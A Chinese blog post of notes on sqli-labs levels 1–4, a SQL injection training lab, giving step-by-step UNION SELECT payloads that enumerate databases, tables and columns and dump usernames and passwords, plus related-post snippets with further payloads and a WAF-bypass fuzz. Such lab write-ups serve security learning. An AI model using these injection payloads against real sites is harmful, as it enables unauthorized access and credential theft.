sqli-labs闯关笔记

最新推荐文章于 2024-09-09 10:43:28 发布
最新推荐文章于 2024-09-09 10:43:28 发布
阅读量160 收藏
点赞数 1
文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46789316/article/details/110517753
版权

sqli-labs闯关笔记

第一关

1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询
在这里插入图片描述

http://sqli-labs:84/Less-1/?id=1 and 1=2--+

%20是空格

2.在id后面加上’,发现页面回显不正常,表示可能存在SQL字符注入
在这里插入图片描述

http://sqli-labs:84/Less-1/?id=1'

%27是单引号

3.输入--+将sql后面的语句注释掉后,发现页面回显正常,证明这个地方是单引号字符型注入
在这里插入图片描述
--+是注释

4.接着使用order by 语句判断,该表中一共有几列数据
order by 1-3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

http://sqli-labs:84/Less-1/?id=1' order by 4--+

5.将id=1改为一个数据库不存在的id值,如857,使用union select 1,2,3联合查询语句查看页面是否有显示位。

(这个显示位指的是网页中能够显示数据的位置。
举例来说,比如我们通过ORDER BY命令知道了表的列数为11。然后再使用UNION SELECT 1,2,3…,11 from table,网页中显示了信息8,那么说明网页只能够显示第8列中信息,不能显示其他列的信息。也可以理解为网页只开放了8这个窗口,你想要查询数据库信息就必须要通过这个窗口。)

http://sqli-labs:84/Less-1/?id=857' union select 1,2,3--+

在这里插入图片描述
发现页面先输出了2和3,说明页面有2个显示位

6.然后利用sql查询语句依次爆破出数据库内的数据库名,表名,列名,字段信息

?id=857’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

在这里插入图片描述
这是一个查询数据库名信息的语句
group_concat是能将相同的行组合起来的函数
在这里插入图片描述
在这里插入图片描述
查询库中有多少表:

?id=-1 'union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()--+`

在这里插入图片描述
在这里插入图片描述
查询敏感信息表的字段:

?id=-1'union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users'--+

查询敏感字段内容:
在这里插入图片描述

?id=-1'union select 1,group_concat(username),group_concat(password) from security.users--+

第二关

无符号包裹的报错注入GET

输入?id=1’,报错回显如下
在这里插入图片描述
传入的是1’但是报错信息只有’ limit 0,1那么就是id就是无符号包裹

不用闭合直接注–+释掉后面的语句即可
方法和less-1一样
利用mysql自带的信息表查询库,表,字段的名称

查询数据库名,数据库用户名等信息:?id=857 union select 1,user(),database()--+

查询库中有多少表:?id=857 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()--+

查询敏感信息表的字段:?id=857 union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users'--+

查询敏感字段内容:?id=-1 union select 1,group_concat(username),group_concat(password) from security.users--+

在这里插入图片描述

第三关

?id=1'报错回显
在这里插入图片描述

?id=-1' ) union select 1,2,3--+

在这里插入图片描述

?id=-1') union select 1,version(),user() --+

在这里插入图片描述
省略一些步骤 其他和一二关一样 不多赘述了

在这里插入图片描述

?id=-1') union select 1,group_concat(username),group_concat(password) from security.users--+

第四关

?id=1' 页面没有报错 试试?id=1"
在这里插入图片描述
?id=1")--+闭合常规注入即可

?id=-1")union select 1,version(),database()--+

在这里插入图片描述

?id=-1") union select 1,group_concat(username),group_concat(password) from security.users--+

省略一些步骤 其他和一二关一样 不多赘述了

在这里插入图片描述

Sweetie_x
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL-Bypass安全狗4.0
weixin_45716091的博客
10-21 431
实验环境: sqli-labs 网站安全狗Linux-Apache版 版本:V2.3.18809 CentOS7+宝塔面板 apache+php+mysql 注意: 安全狗需要开启记录并拦截,否则只会记录不会拦截,没有弹窗。 这里以sqli-labs的Less-1为例。 判断注入 存在字符型注入。如果没有错误回显,可以输入payload:?id=2-1 等等来判断。 Fuzz: 1' --+- 未拦截(不拦截注释符) 1' and '1'='1 拦截 1' and 1=1 .
sqli-labs靶场通关技巧(1-20)
ldzhhh的博客
07-26 2230
Less1 注入步骤: 在参数后面加上单引号,数据库报错,说明存在注入 id=1' and 1=1--+,返回正常 id=1' and 1=2--+,返回数据为空,说明这是个基于单引号的字符型注入 用二分法逐步判断字段数,此处有3个字段:id=1' order by 3--+ 确定回显点:id=-1' union select 1,2,3--+(参数1改成数据库不存在的值,如0或者负数) 暴库payload: id=-1' union select 1,2,dat.
sql注入,关于id=‘1 and 1=1‘
热门推荐
m0_55306747的博客
11-25 1万+
在做sql-labs靶场时,学到了,这个知识点很重要,当时发现这个问题困惑了我许久 正常的注入语句:select * from users where id = 1 select * from users where id = '1'也可以查询出和语句一相同的结果 select * from users where id = '$id' 令id=1" 语句变为select * from users where id = '1"' 此时引号正常闭合,按理说应当是查询users表中,id为1"的所有
sqli-labs闯关笔记(Basic Injections)
末初的CSDN博客
05-05 1268
sqli-labs项目地址:https://github.com/Audi-1/sqli-labs Less-1 单引号报错注入GET 对传入的id参数单引号包裹,并且未作任何出参处理 对单引号闭合,联合查询注入即可 可以看下当传入payload是如何拼接闭合进行注入的 http://127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,user(...
sqli-labs闯关笔记(Stacked Injections)
末初的CSDN博客
05-12 459
sqli-labs项目地址:https://github.com/Audi-1/sqli-labs 文章目录Less-38Less-39Less-40Less-41Less-42Less-43Less-44Less-45Less-46Less-47Less-48Less-49Less-50Less-51Less-52Less-53 正文(堆叠注入) Less-38 使用了一系列执行mysql多条语句查询的函数,导致存在堆叠注入,但是因为源码中一般只返回预期结果,所以堆叠注入的结果回显或者报错就无法.
sqli-labs闯关笔记(Advanced Injections)
末初的CSDN博客
05-09 528
sqli-labs项目地址:https://github.com/Audi-1/sqli-labs 文章目录Less-23Less-24Less-25Less-26Less-27Less-28Less-29Less-30Less-31Less-32Less-33Less-34Less-35Less-36Less-37 正文 Less-23 对id传进来的值过滤了#,--SQL注释 不过没...
sqli-labs闯关66~75
qq_44663230的博客
09-13 618
这是个空文档,只有两张思维导图!!! sqli-labs66~75
Sqli-Labs 通关笔记
m0_43397796的博客
08-07 2461
Sqli-Labs靶场
sqli-labs闯关记录(1~65关)
qq_62540010的博客
01-04 3823
sql漏洞闯关记录笔记(1~15) 1.基本知识 首先我们先了解SQL注入是什么: SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一,其实就是恶意用户通过在可提交给数据库的地方写入恶意代码,将数据库的数据提取出来。. 2.工具 在1~15关,我们要用到hacbar,burpsuit,中国蚁剑,并且我用的是phpstudy2018来配置的Apache和mysql. 3.less 1,2,3,4 之所以把1234关一起破解,是因为它们属于同一类型,下面我们来看一看他们的不同
sqli-lib64关闯关笔记学习资料.zip
08-22
sqli-labs-1-65閫氬叧鏁欑▼share(by sm0nk).md》这个文件很可能包含了作者sm0nk在完成sqli-lib64所有65关的过程中所记录的笔记和技巧。通过阅读这份文档,你可以了解到每个关卡的关键思路、解题方法以及可能遇到...
Python面试题大全SQLi第八关,Sqli-labs Less-8,Python知识总结
m0_60144796的博客
04-05 342
Python崛起并且风靡,因为优点多、应用领域广、被大牛们认可。学习 Python 门槛很低,但它的晋级路线很多,通过它你能进入机器学习、数据挖掘、大数据,CS等更加高级的领域。Python可以做网络应用,可以做科学计算,数据分析,可以做网络爬虫,可以做机器学习、自然语言处理、可以写游戏、可以做桌面应用…Python可以做的很多,你需要学好基础,再选择明确的方向。这里给大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
sqli-labs Less -18—Less -22(sqli-labs闯关指南 18—22)--http头部注入相关
m0_54899775的博客
12-19 1434
sqli-labs Less -18—Less -22(sqli-labs闯关指南 18—22)--http头部注入相关 sqlilabs Less-18、Less-19、Less-20、Less-21、Less-22
史上最详细的sql-labs通关秘籍less1-4
weixin_50644728的博客
11-24 851
到此就完整地过了一遍less1了,总结来说有以下几个步骤:先判断注入类型:是数值型还是字符型,通过测试可知less1为字符型注入(引号包裹id值),闭合单引号判断字段数:用order by测试回显字段:用union select 1,2,3,……获取数据库名:用database()函数获取数据表名:用group_concat(table_name)、information_schema.tables表中的security数据库。
Java项目: 基于SpringBoot+mysql房产销售系统 (含源码+数据库+开题报告+答辩PPT+毕业论文)
weixin_43860634的博客
09-03 636
Java项目: 基于SpringBoot+mysql房产销售系统 (含源码+数据库+开题报告+答辩PPT+毕业论文)
策略规划:在MySQL中实现数据恢复的全面指南
2401_85339615的博客
09-04 1108
数据恢复是数据库管理中至关重要的一环,它确保在发生数据丢失或损坏的情况下,能够迅速且准确地恢复数据。在MySQL中,实现有效的数据恢复策略规划需要综合考虑备份策略、备份类型、存储管理、故障转移机制以及恢复流程。本文将深入探讨如何在MySQL中进行数据恢复的策略规划,包括策略制定、技术实现和最佳实践。
MySQL 大量 IN 的查询优化
最新发布
xchenhao 的博客
09-09 375
MySQL 大量 IN 的查询优化
三.海量数据实时分析-FlinkCDC实现Mysql数据同步到Doris
墨家巨子@俏如来
09-07 1202
通过上面的 route 配置,会将 app_db.orders 表的结构和数据同步到 ods_db.ods_orders 中。这样,就可以将诸如 app_db.order01、app_db.order02、app_db.order03 的表汇总到 ods_db.ods_orders 中。参考:https://nightlies.apache.org/flink/flink-cdc-docs-release-3.0/zh/docs/get-started/quickstart/mysql-to-doris/
【重学 MySQL】十四、显示表结构
CSDN全栈领域优秀博主,阿里云博客专家,工信部权威认证物联网技术开发工程师,曾30分钟高分通过C语言二级,两天手撸代码完成EasyX飞机大战,靠接软件私活一个月换苹果电脑
09-06 693
以上就是在MySQL中显示表结构的几种常用方法。DESCRIBE或DESC命令和命令提 供了快速查看表列信息的简便方式,而查询数据库则提供了更详细、更灵活的信息获取方式。命令则适用于需要查看或复制表完整结构的情况。
sqli-labs闯关
10-09
很高兴为您解答关于sqli-labs闯关的问题!sqli-labs是一个用于学习和实践SQL注入的实验室。通过完成各个关卡,您将能够了解和掌握SQL注入的不同技术和攻击方法。 要开始sqli-labs闯关,您可以按照以下步骤进行: 1. 下载sqli-labs:您可以在GitHub上找到sqli-labs的源代码并下载到本地环境。 2. 配置环境:根据sqli-labs的README文件,您需要配置适当的web服务器环境(例如Apache、PHP等)以及数据库(例如MySQL)。 3. 导入数据库:使用提供的SQL脚本文件,导入sqli-labs所需的数据库结构和数据。 4. 开始闯关:访问您的本地服务器,并根据提示依次完成每个关卡。每个关卡都会提供一个具有潜在SQL注入漏洞的页面,您需要利用这些漏洞来获取敏感信息或执行其他恶意操作。 5. 学习和实践:在完成每个关卡后,阅读解释和提示,深入了解所使用的攻击技术和漏洞原理。尝试自己设计和实现一些新的攻击方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值